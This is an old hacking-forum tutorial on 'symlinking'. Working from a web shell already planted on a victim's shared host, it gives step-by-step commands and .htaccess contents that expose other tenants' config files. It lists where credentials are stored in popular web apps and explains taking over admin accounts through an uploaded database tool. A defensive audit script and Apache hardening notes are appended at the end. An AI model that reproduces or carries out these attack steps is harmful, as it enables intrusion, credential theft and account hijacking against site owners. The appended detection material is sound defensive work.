symlinking [TuT]

Written By Unknown on Tuesday, 2 October 2012 | 14:39

#First Method:-
After uploading the shell make a new directory by an option or execute this command:

Quote:
mkdir sym
that will make a directory with the name "sym"
then enter the directory you made, then make a file and call it ".htaccess" by running this command:

Quote:
touch .htaccess
then put the code inside
or make it on your PC and upload it.
and this is the code you should put in that file:

Code:

Options all 
DirectoryIndex Sux.html 
AddType text/plain .php 
AddHandler server-parsed .php 
AddType text/plain .html 
AddHandler txt .html 
Require None 
Satisfy Any

As you can see in the following picture, the file name is sym, and I'm showing the content of the ".htaccess" file:

http://i41.tinypic.com/kaoknd.png

Then, execute this command:

Quote:
ln -s /root
http://i40.tinypic.com/15g9qx4.png

Let's carry on.
Now go to the website's link and enter your directory from there, for example it might be like this:
http://www.victim.com/sym
hit enter, now you should see something like this:

http://f1204.hizliresim.com/w/l/4l6fv.png

if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
OK, now pick any site's user and let's hack it!
After you know the user, go to your URL and type this:
http://www.victim.com/sym/root/home/(user)/public_html

#Of course, replace (user) with the target website's user.
You will see something like this:

http://i41.tinypic.com/mr8mrb.png

the user in that picture is "hillock"
now you will be able to browse that site's files.
But we are looking for a specific file called "config.php" or "configuration.php"; some websites use a different name, but those are the most common ones.
Here are some famous web apps with their configuration file locations:

Quote:
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php



So after you find the configuration file, you will look for the DB user and password. For example, the picture below shows a Joomla! configuration file and I've selected the info we look for:

http://i43.tinypic.com/14abedw.png

After that, download sql.php from the attachments and upload it through your shell,
then copy the login info from the configuration file and sign in to sql.php.
When you sign in, it will look something like this:

http://i39.tinypic.com/14jnjfl.png

I'll tell you what to do after that in the end!
=======================================
#Second Method:-
This method is almost the same, but we don't read the configuration file from the same site; instead we symlink it to our victim's site as a .txt file. Let's see how to do it!
For this method you don't need to symlink the /root directory; you will symlink the target website's public_html.
Now let's see the steps:
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:

Code:

Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php

#Finally symlink the target website with this command:

Quote:
ln -s /home/(user)/public_html (user)


Then enter your directory by putting the URL like this:
http://www.victim.com/sym/
and you should see something like this:

http://i40.tinypic.com/14v192q.png

In this picture the user is "csseipsn".
Now click on the user and again you will be able to browse the website's files and look for the configuration file, and then do the same as in the first method!
============================
Now what to do in sql.php?
It's simple: sql.php gives you access to the MySQL database and lets you edit the data.
Now just find the admin's table, crack the hash and you will have the password and can sign in!
Hmm... the hash didn't crack? No problem, change the admin's email and choose the forgot-password option and they will send you a new password!
And the third way is to change the admin's hash to your hash and sign in.
Well, that's it!

Hope you like this.

credit to $y$tE^M32 
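
For whoever runs the shared server, both methods leave the same two artifacts on disk: a symlink inside a web root that resolves outside the owning account, and an .htaccess that turns on link-following or remaps .php to a text handler. The following audit script is an added example, not part of the original post; the names `audit_account` and `demo`, the accounts "alice" and "bob", and the `<home>/public_html` layout are assumptions made for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Directives from the two .htaccess files above: link-following enabled, or
# .php remapped to a plain-text / SSI handler so source is shown, not run.
RISKY = re.compile(
    r"\s*(Options\b.*(?<![-\w])(All|FollowSymLinks)\b"
    r"|Add(Type|Handler)\s+(text/plain|txt|server-parsed)\s+.*\.php\b)",
    re.IGNORECASE,
)

def audit_account(home):
    """Return sorted (kind, relative path, detail) findings for one account."""
    home = Path(home).resolve()
    findings = []
    # os.walk lists symlinked directories but does not descend into them.
    for root, dirs, files in os.walk(home / "public_html"):
        for name in dirs + files:
            path = Path(root) / name
            rel = str(path.relative_to(home))
            if path.is_symlink():
                target = Path(os.path.realpath(path))
                if target != home and home not in target.parents:
                    findings.append(("symlink-escape", rel, str(target)))
            elif name == ".htaccess":
                for line in path.read_text(errors="replace").splitlines():
                    if RISKY.match(line):
                        findings.append(("htaccess", rel, line.strip()))
    return sorted(findings)

def demo():
    """Constructed tree: 'alice' holds the sym/ directory, 'bob' is a neighbour."""
    base = Path(tempfile.mkdtemp()).resolve()
    alice, bob = base / "home/alice", base / "home/bob"
    (alice / "public_html/sym").mkdir(parents=True)
    (alice / "shared").mkdir()
    (bob / "public_html").mkdir(parents=True)
    (alice / "public_html/sym/.htaccess").write_text(
        "Options Indexes FollowSymlinks\nDirectoryIndex z0mbie.htm\n"
        "AddType txt .php\nAddHandler txt .php\n")
    os.symlink(bob / "public_html", alice / "public_html/sym/bob")  # escapes
    os.symlink(alice / "shared", alice / "public_html/assets")      # stays inside
    return audit_account(alice), str(bob / "public_html")

if __name__ == "__main__":
    for finding in demo()[0]:
        print(*finding, sep="\t")
```

On the Apache side, the matching hardening is `Options -FollowSymLinks +SymLinksIfOwnerMatch` combined with an `AllowOverride` that does not let accounts change `Options` or `FileInfo` from .htaccess. Apache's documentation notes that the owner-match check is subject to race conditions, so per-account file permissions on home directories and config files still have to deny other users read access.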